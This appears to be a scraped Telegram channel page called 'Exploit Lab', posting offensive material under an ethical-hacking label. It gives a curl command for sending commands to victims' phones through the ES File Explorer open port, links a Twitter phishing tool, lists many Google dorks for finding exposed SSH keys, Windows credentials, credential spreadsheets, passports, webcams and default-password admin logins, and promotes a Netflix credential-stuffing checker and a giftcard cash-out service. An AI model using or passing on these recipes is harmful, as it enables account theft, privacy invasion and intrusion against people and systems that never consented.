Exploit Lab
54 members
4 photos
1 video
3 files
24 links
Ethical hacking
Download Telegram
to view and join the conversation
Exploit Lab
GIF
Exploiting #CVE-2019-0192 Apache Solr RCE(via jmx.serviceUrl)
more info about the exploit would be shared soon
Exchange Giftcards to BTC, USD, PayPal, cashapp, venmo , Naira, Chinese RMB

Fast Payout at a good rate
uploading free resources soon.
EBOOK
GIFTCARD
Help Us Grow! Don't stop sharing
»»»»»Exploitlab .
ES File Explorer (File Manager) is a full-featured file (Images, Music, Movies, Documents, app) manager for both local and networked use! With over 500 million users worldwide, ES File Explorer (File Manager) helps manage your android phone and files efficiently and effectively and share files without data cost.

Everytime a user is launching the app, a HTTP server is started. This server is opening locally the port 59777:

angler:/ # netstat -ap | grep com.estrongs
tcp6 0 0 :::59777 :::* LISTEN 5696/com.estrongs.android.pop
On this port, an attacker can send a JSON payload to the target

curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777
These commands allow an attacker connected on the same local network to the victim, to obtain a lot of juicy information (device info, app installed, ...) about the victim's phone, remotely get a file from the victim's phone and remotely launch an app on the victim's phone.

Affected Versions
4.1.9.7.4 and below
PoT - Phishing On Twitter

How it works?
1- Collect data from target's twitter account
2- Find target's friend and copy her/him account
3- Generate tweet automatically with markov chain algorithm and send it

download url : https://github.com/omergunal/PoT
++ All sorts of Websites (a lot of colleges) ++
intitle:"index of /" ssh

Data you find:
- Webserver Version
- SSH Version
- SSH Keys
- SSH Logins
- SSH .exe files

I found a lot of servers using < SSH 1.4.*
These are usually +5 years old and full of security holes
A search in Exploit DB for SSH 1. turns up +40.000 exploits for these
some may work.

++ 55 500 results at the time of writing ++


DISCLAIMER:
The vulnerabilities are suggestions, none of them have been tested by me,
always request permission before testing anything on someone else system.
Dork for finding private directories inside wordpress popup plugin including admin data which are present in Wordpress websites.

Note : To access more sensitive files locate to parent directory until

/admin or /conf etc.

Dork : allinurl:"wp-content/plugins/wordpress-popup/views/admin/"

Also Try : allinurl:"wp-content/plugins/wordpress-popup/"
Dork about webcams and ip cameras server for windows

intitle:"webcam 7" inurl:'/gallery.html'



Credentials in Windows folder

intitle:"index of" "Application Data/Microsoft/Credentials"
Useful dorks

intitle:"index of" inurl:documents backup
intitle:"index of" users.csv | credentials.csv | accounts.csv
Dork about login panels of Xfinity Routers
intitle:"Login - Xfinity" AND "Gateway > Login"

Windows trash bins with a lot of juicy info.
You can also get drive letters and folders by attaching :%5C/
before $Recycle.bin %5C is "\"
intitle:"index of" $Recycle.bin

intitle:"index of" "/Windows/Recent" | "/Windows/History/"
This will give you the most recent used files and the history data.
This is for Vista - Windows 10, it will not work against XP or Windows 2003


inurl:"/.Trash" intitle:"index of" ~

inurl:"/cgi-bin/WS_FTP.LOG"

inurl:login.htm "access" database
intitle:"Log in - WhatsUp Gold"

Description: This google dork can expose the landing log in page for
WhatsUp Gold network monitoring tool.
Here's the published CVE link for WhatsUp Gold:
https://www.cvedetails.com/vulnerability-list/vendor_id-193/product_id-3865/Ipswitch-Whatsup-Gold.html
Google dork *description: * Sites running WordPress CMS and access to the
wp-json API endpoint which *might* be vulnerable to content injection
*Google Search: *inurl:"/wp-json/" -wordpress
intitle:Login inurl:login.php intext:admin/admin
This Google Dork discovers login portals with weak default passwords.
intitle:”Index of /“ inurl:passport
Find a lot of passports
🔥 Netflix Proxyless Checker 🔥

Highly Requested 🔥

Connect to USA IP in VPN

Load Combos and Set Threads to 5 and Enjoy Hits

Link to Download : https://www.file-up.org/q211kr9wu83u